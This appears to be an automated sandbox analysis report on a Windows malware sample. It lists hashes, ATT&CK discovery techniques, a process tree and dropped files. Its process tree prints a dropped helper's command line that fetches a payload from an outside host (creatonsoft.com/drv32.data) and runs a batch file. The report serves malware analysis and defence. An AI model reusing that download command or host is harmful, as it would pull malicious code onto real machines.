6c74a34552008d0fad98199544cfe3463ae4b783969997206c9503d826006f37

Analysis

max time kernel
94s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
06/09/2024, 08:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cf2698bbd827384c2d80ce7260730dfa_JaffaCakes118.exe
Size

105KB
MD5

cf2698bbd827384c2d80ce7260730dfa
SHA1

b2dfbb6eb14761517c0376fea844e3e898b4fe05
SHA256

6c74a34552008d0fad98199544cfe3463ae4b783969997206c9503d826006f37
SHA512

4caec1ea40b13e412b74d9ac5f8147fc16b20eb554f457723fc97539b870cb38c750b2125bea19b238a07ab49a44b7394d4a5ad9a6f8d341162c6a4a61d7625a
SSDEEP

3072:3ZlsN/vCtko2SYgnZoRHdrHx5GXBwLWNI3:JlsNJo2ShZoldrPGXB5I3

Score

7^/10

discovery

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	cf2698bbd827384c2d80ce7260730dfa_JaffaCakes118.exe

Executes dropped EXE 1 IoCs

pid	Process
4680	GB4BA-tmp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cf2698bbd827384c2d80ce7260730dfa_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GB4BA-tmp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1408 wrote to memory of 4680	1408	cf2698bbd827384c2d80ce7260730dfa_JaffaCakes118.exe	84
PID 1408 wrote to memory of 4680	1408	cf2698bbd827384c2d80ce7260730dfa_JaffaCakes118.exe	84
PID 1408 wrote to memory of 4680	1408	cf2698bbd827384c2d80ce7260730dfa_JaffaCakes118.exe	84
PID 1408 wrote to memory of 4452	1408	cf2698bbd827384c2d80ce7260730dfa_JaffaCakes118.exe	88
PID 1408 wrote to memory of 4452	1408	cf2698bbd827384c2d80ce7260730dfa_JaffaCakes118.exe	88
PID 1408 wrote to memory of 4452	1408	cf2698bbd827384c2d80ce7260730dfa_JaffaCakes118.exe	88

C:\Users\Admin\AppData\Local\Temp\cf2698bbd827384c2d80ce7260730dfa_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\cf2698bbd827384c2d80ce7260730dfa_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1408
- C:\Users\Admin\AppData\Local\Temp\GB4BA-tmp.exe
  C:\Users\Admin\AppData\Local\Temp\GB4BA-tmp.exe http://creatonsoft.com/drv32.data "C:\Users\Admin\AppData\Local\Temp\GB4BB-tmp"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4680
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\tmp.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4452

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\68XY2BI1\TZY6DJJ6.htm

Filesize
1.6MB

MD5
e8c0f02e2fe5af6159590d245178cb15

SHA1
f890f9721f87fc0e83eba14546fe0232b872dc4f

SHA256
393646c4038c1431b332041e68a94a1e085f249b6f0b856d7fbd163c09295e16

SHA512
352fc9cfb3aa2636391eb5ec5577ea5fafd3a37af20a781846fa7db5566196b3ad0e7fdd33ffab56949009f9f712d0e3377c47644e71f2186a28deb8cf077033

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB4BA-tmp

Filesize
149KB

MD5
b433088a544ac4f2307108af859da646

SHA1
9ef08188ba1a20d2f0cb5a76435de75a11a57c14

SHA256
315ae503e54fc45b70f2c0c2567a9f40144f2ac0555f43be3e5106d2ca4da277

SHA512
db44bc16d5a97f9df662881070e32dcedf92d40658d42c6fd8b3efe26217100e4ca2b743c5243fd5ac81e98873cf7acad039d6b7de12ed9d13ee2df399166e3e

Download Submit
C:\tmp.bat

Filesize
50B

MD5
01419d91b0883bc354b89a3577c451a1

SHA1
7c3911d3d4e2a72610abf4470d39dddd7cb63805

SHA256
a54298c6c68619d9b60dea41534fdcc95cbdde5a6e9f8323658e594ee1330ca3

SHA512
7f08e25014b313d70c6b443e61f9e795fee3f35358c824a89ecd97809fa9e68fc300ea1607a2d37b0346a54ccaf5e135f7ef885ca15f36543fca747e7aedb700

Download Submit
memory/1408-0-0x0000000000400000-0x00000000004A1000-memory.dmp

Filesize
644KB

Download
memory/1408-35-0x0000000000400000-0x00000000004A1000-memory.dmp

Filesize
644KB

Download
memory/4680-29-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download